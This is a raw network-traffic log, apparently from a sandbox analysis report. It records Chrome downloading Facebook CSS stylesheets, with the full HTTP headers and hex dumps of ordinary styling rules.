                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: acLcIazTM78m7KuPb/2h+/v3BWe8cdIvEP47i/vJeudzO0t2MR5PLUQz8pFKCU4GGRDU013h5FB7ym/BbyaGTg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 135216
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 2e
                                                                                                                                                                                                                                  Data Ascii: .
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC15878INData Raw: 5f 35 33 69 6a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 63 61 72 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 20 23 46 46 46 46 46 46 29 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 5f 35 33 69 6f 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 5f 35 33 69 68 20 2e 5f 35 33 69 6f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2e 5f 35 34 61 66 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 5f 35 34 61 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 72 2f 5f 50 53 73 4e 7a 36 54 61 37 72 2e 70 6e
                                                                                                                                                                                                                                  Data Ascii: _53ij{background:#fff;background:var(--card-background, #FFFFFF);position:relative}._53io{overflow:hidden;position:absolute}._53ih ._53io{display:none}._54af{padding:5px 0 3px;text-align:center}._54ag{background-image:url(/rsrc.php/v3/y_/r/_PSsNz6Ta7r.pn
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 32 36 6b 39 32 61 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 7d 2e 78 31 32 37 6c 68 62 35 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 78 65 6b 76 36 6e 77 2d 42 7d 2e 78 31 32 38 31 65 78 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 70 72 65 73 73 65 64 29 7d 2e 78 31 32 63 73 6e 68 63 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 76 61 72 28 2d 2d 78 71 79 38 38 73 35 29 7d 2e 78 31 32 67 6f 39 73 39 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 39 39 39 70 78 7d 2e 78 31 32 6a 72 33 30 36 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 34 37 25 2c 31 39 33 25 29 20 72 6f 74 61 74 65 28 2d 35 64 65 67 29
                                                                                                                                                                                                                                  Data Ascii: 26k92a{white-space:pre-wrap}.x127lhb5{animation-name:xekv6nw-B}.x1281ex9{background-color:var(--secondary-button-pressed)}.x12csnhc{text-transform:var(--xqy88s5)}.x12go9s9{border-top-right-radius:999px}.x12jr306{transform:translate(47%,193%) rotate(-5deg)
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 61 72 64 29 7d 2e 78 31 69 75 74 76 73 7a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 72 65 73 73 2d 6f 76 65 72 6c 61 79 29 7d 2e 78 31 69 75 77 69 30 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 29 7d 2e 78 31 69 79 6a 71 6f 32 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 2e 78 31 6a 30 37 79 78 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 78 31 73 77 76 71 76 39 29 7d 2e 78 31 6a 30 74 72 34 64 7b 66 6c 65 78 2d 62 61 73 69 73 3a 28 31 30 30 20 2f 20 33 29 25 7d 2e 78 31 6a 32 30 6d 68 39 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 32 73 7d 2e 78 31 6a 33 62 35 63 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 78 6e 68 62
                                                                                                                                                                                                                                  Data Ascii: ard)}.x1iutvsz{background-color:var(--press-overlay)}.x1iuwi03{background-color:var(--secondary-text)}.x1iyjqo2{flex-grow:1}.x1j07yxv{font-size:var(--x1swvqv9)}.x1j0tr4d{flex-basis:(100 / 3)%}.x1j20mh9{transition-duration:2s}.x1j3b5cy{font-size:var(--xnhb
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 7d 2e 78 33 32 33 66 31 78 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 76 61 72 28 2d 2d 78 31 67 68 68 37 6a 67 29 7d 2e 78 33 36 31 72 76 71 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 74 65 78 74 2d 69 6e 70 75 74 2d 66 69 65 6c 64 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 29 2c 73 79 73 74 65 6d 2d 75 69 2c 73 61 6e 73 2d 73 65 72 69 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 78 33 39 65 65 63 76 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 70 78 7d 2e 78 33 39 69 6e 6e 63 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 29 7d 2e 78 33 39 76 69 77 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 34 65 36 65 62 7d 2e 78 33 61 6a 6c 64
                                                                                                                                                                                                                                  Data Ascii: }.x323f1x{letter-spacing:var(--x1ghh7jg)}.x361rvq{font-family:var(--text-input-field-font-family),system-ui,sans-serif!important}.x39eecv{margin-left:-1px}.x39innc{border-right-color:var(--secondary-button-stroke)}.x39viwf{background-color:#e4e6eb}.x3ajld
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1500INData Raw: 74 65 28 31 32 33 25 2c 31 32 33 25 29 7d 2e 78 6c 31 78 76 31 72 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 7d 2e 78 6c 33 37 68 69 31 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 74 65 78 74 2d 62 61 64 67 65 2d 63 6f 72 6e 65 72 2d 72 61 64 69 75 73 29 7d 2e 78 6c 34 32 33 74 71 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 30 30 70 78 7d 2e 78 6c 34 6b 36 64 75 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 32 25 2c 31 38 38 25 29 7d 2e 78 6c 35 32 31 73 6d 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 35 70 78 7d 2e 78 6c 35 36 6a 37 6b 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 78 6c 36 61 73 6b 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f
                                                                                                                                                                                                                                  Data Ascii: te(123%,123%)}.xl1xv1r{object-fit:cover}.xl37hi1{border-top-right-radius:var(--text-badge-corner-radius)}.xl423tq{margin-left:-100px}.xl4k6du{transform:translate(2%,188%)}.xl521sm{padding-right:25px}.xl56j7k{justify-content:center}.xl6askr{border-right-co
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 61 36 66 32 7b 72 6f 77 2d 67 61 70 3a 76 61 72 28 2d 2d 72 6f 77 47 61 70 2c 72 65 76 65 72 74 29 7d 2e 78 6d 38 6b 71 72 76 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 73 65 70 61 72 61 74 6f 72 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6d 61 72 67 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 29 7d 2e 78 6d 39 35 31 73 69 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 39 38 25 2c 36 30 2e 35 25 29 20 72 6f 74 61 74 65 28 31 31 2e 38 33 64 65 67 29 7d 2e 78 6d 64 68 66 63 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 78 31 6c 39 36 72 69 6e 29 7d 2e 78 6d 64 73 35 65 66 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 63 63 65 6e 74 29 7d 2e 78 6d 67 62 72 73 78 7b 2d 77 65 62 6b 69 74 2d 66
                                                                                                                                                                                                                                  Data Ascii: a6f2{row-gap:var(--rowGap,revert)}.xm8kqrv{margin-right:var(--separator-menu-item-margin-horizontal)}.xm951si{transform:translate(98%,60.5%) rotate(11.83deg)}.xmdhfcl{font-weight:var(--x1l96rin)}.xmds5ef{border-right-color:var(--accent)}.xmgbrsx{-webkit-f
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 6d 3a 6e 6f 6e 65 7d 2e 78 34 61 33 34 7a 33 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 65 72 72 6f 72 2d 61 63 74 69 76 65 29 7d 2e 78 63 6f 6a 75 6e 61 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 77 61 72 6e 2d 61 63 74 69 76 65 29 7d 2e 78 6b 34 6f 79 6d 34 3a 61 63 74 69 76 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 7b 2e 78 31 30 6f 32 61 39 34 2e 78 31 30 6f 32 61 39 34 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 7d 40 6d 65 64
                                                                                                                                                                                                                                  Data Ascii: m:none}.x4a34z3:active{background-color:var(--input-background-error-active)}.xcojuna:active{background-color:var(--input-background-warn-active)}.xk4oym4:active{transform:scale(.98)}@media (max-width: 900px){.x10o2a94.x10o2a94{flex-direction:column}}@med
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 7d 2e 78 31 79 78 32 35 6a 34 7b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 36 30 70 78 29 7d 2e 78 31 79 7a 6d 68 69 73 7b 68 65 69 67 68 74 3a 31 36 37 70 78 7d 2e 78 31 79 7a 74 62 64 62 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 78 32 31 66 67 38 30 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 76 61 72 28 2d 2d 74 6f 61 73 74 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 7d 2e 78 32 31 78 70 6e 34 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 78 32 33 6a 30 69 34 7b 77 69 64 74 68 3a 32 36 70 78 7d 2e 78 32 33 6b 72 6b 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 78 62 61 72 61 7a 6d 29 7d 2e 78 32 35 36 75 39 7a 7b 6d 61
                                                                                                                                                                                                                                  Data Ascii: adding-top:6px}.x1yx25j4{max-width:calc(100% - 60px)}.x1yzmhis{height:167px}.x1yztbdb{margin-bottom:16px}.x21fg80{border-bottom-width:var(--toast-border-width)}.x21xpn4{min-height:32px}.x23j0i4{width:26px}.x23krkg{padding-bottom:var(--xbarazm)}.x256u9z{ma
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC14884INData Raw: 31 65 72 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 61 75 74 6f 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 29 7b 2e 78 31 6f 67 33 72 35 31 2e 78 31 6f 67 33 72 35 31 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 39 39 70 78 29 7b 2e 78 31 72 69 6b 39 62 65 2e 78 31 72 69 6b 39 62 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 38 39 70 78 29 7b 2e 78 31 72 72 32 35 69 6d 2e 78 31 72 72 32 35 69 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 39 35 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 68 65 69 67 68
                                                                                                                                                                                                                                  Data Ascii: 1erl{min-height:auto}}@media (max-height: 700px){.x1og3r51.x1og3r51{margin-bottom:4px}}@media (max-width: 899px){.x1rik9be.x1rik9be{padding-bottom:0}}@media (min-height: 700px) and (max-height: 789px){.x1rr25im.x1rr25im{max-width:1095px}}@media (min-heigh


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  21192.168.2.649747157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC604OUTGET /rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1927INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: V1LRBe9B7pNtkAwnBCE12g==
                                                                                                                                                                                                                                  Expires: Sat, 27 Sep 2025 21:23:41 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: vItr18FdR7iODYMOJjQpUjykQaJ7IOEQhcJz14wJL0/L1X1XFa2IkhgDmYsqmjq0xPJVvB8OxD69I7z6yrq1Ow==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 9187
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 0a
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC9186INData Raw: 0a 64 69 76 2e 5f 33 71 77 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 34 30 30 7d 2e 5f 33 31 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 65 62 6b 69 74 20 2e 5f 34 32 77 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 31 70 78 7d 2e 5f 33 69 78 6e 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 5f 33 71 77 20
                                                                                                                                                                                                                                  Data Ascii: div._3qw{height:auto;left:0;min-height:100%;position:absolute;right:0;top:0;z-index:400}._31e{position:fixed!important;width:100%}.webkit ._42w{position:absolute;top:0;visibility:hidden;width:1px}._3ixn{bottom:0;left:0;position:fixed;right:0;top:0}._3qw


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  22192.168.2.649746157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC604OUTGET /rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 2o+PrDYYhtjScpZayNLM6Q==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: HdzaHTSUNoOD40hF/qPFQqKBiKMmQGCQuWrSujGxKhsC6gBq5ha/jyVDPnqvVOInbOGsiP/MCk1rqh1NlfzaKw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:16 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 34412
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC1INData Raw: 23
                                                                                                                                                                                                                                  Data Ascii: #
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC15878INData Raw: 6e 61 76 4c 6f 67 69 6e 20 2e 5f 79 6c 34 7b 7a 2d 69 6e 64 65 78 3a 34 7d 2e 5f 79 6c 34 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 32 32 70 78 7d 2e 5f 79 6c 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 36 66 37 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 77 68 69 74 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 33 70 78 20 38 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 68 65 69 67 68 74 3a 32 36 36 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 5f 79 6c 39 7b 63 6f 6c 6f 72 3a 23 37 66 37 66 37 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e
                                                                                                                                                                                                                                  Data Ascii: navLogin ._yl4{z-index:4}._yl4{position:relative;top:22px}._yl8{background-color:#f5f6f7;border:0 solid white;border-radius:3px;box-shadow:0 3px 8px rgba(0, 0, 0, .3);height:266px;padding-bottom:6px;text-align:center}._yl9{color:#7f7f7f;font-size:12px;lin
                                                                                                                                                                                                                                  2024-09-29 04:53:16 UTC16384INData Raw: 62 74 6e 5f 74 68 69 63 6b 62 61 72 7b 6c 65 66 74 3a 31 38 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 37 30 70 78 7d 2e 73 69 67 6e 75 70 5f 61 72 65 61 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 33 70 78 7d 2e 74 69 6d 65 6c 69 6e 65 4c 61 79 6f 75 74 4c 6f 67 67 65 64 4f 75 74 20 2e 73 69 67 6e 75 70 5f 62 74 6e 7b 6c 65 66 74 3a 32 35 30 70 78 7d 0a 2e 70 61 73 7b 70 61 64 64 69 6e 67 3a 35 70 78 7d 2e 70 61 38 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 2e 70 61 6d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 2e 70 61 31 36 7b 70 61 64 64 69 6e 67 3a 31 36 70 78 7d 2e 70 61 6c 7b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 2e 70 74 73 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 70 74 38 7b 70 61 64 64 69 6e 67 2d 74 6f
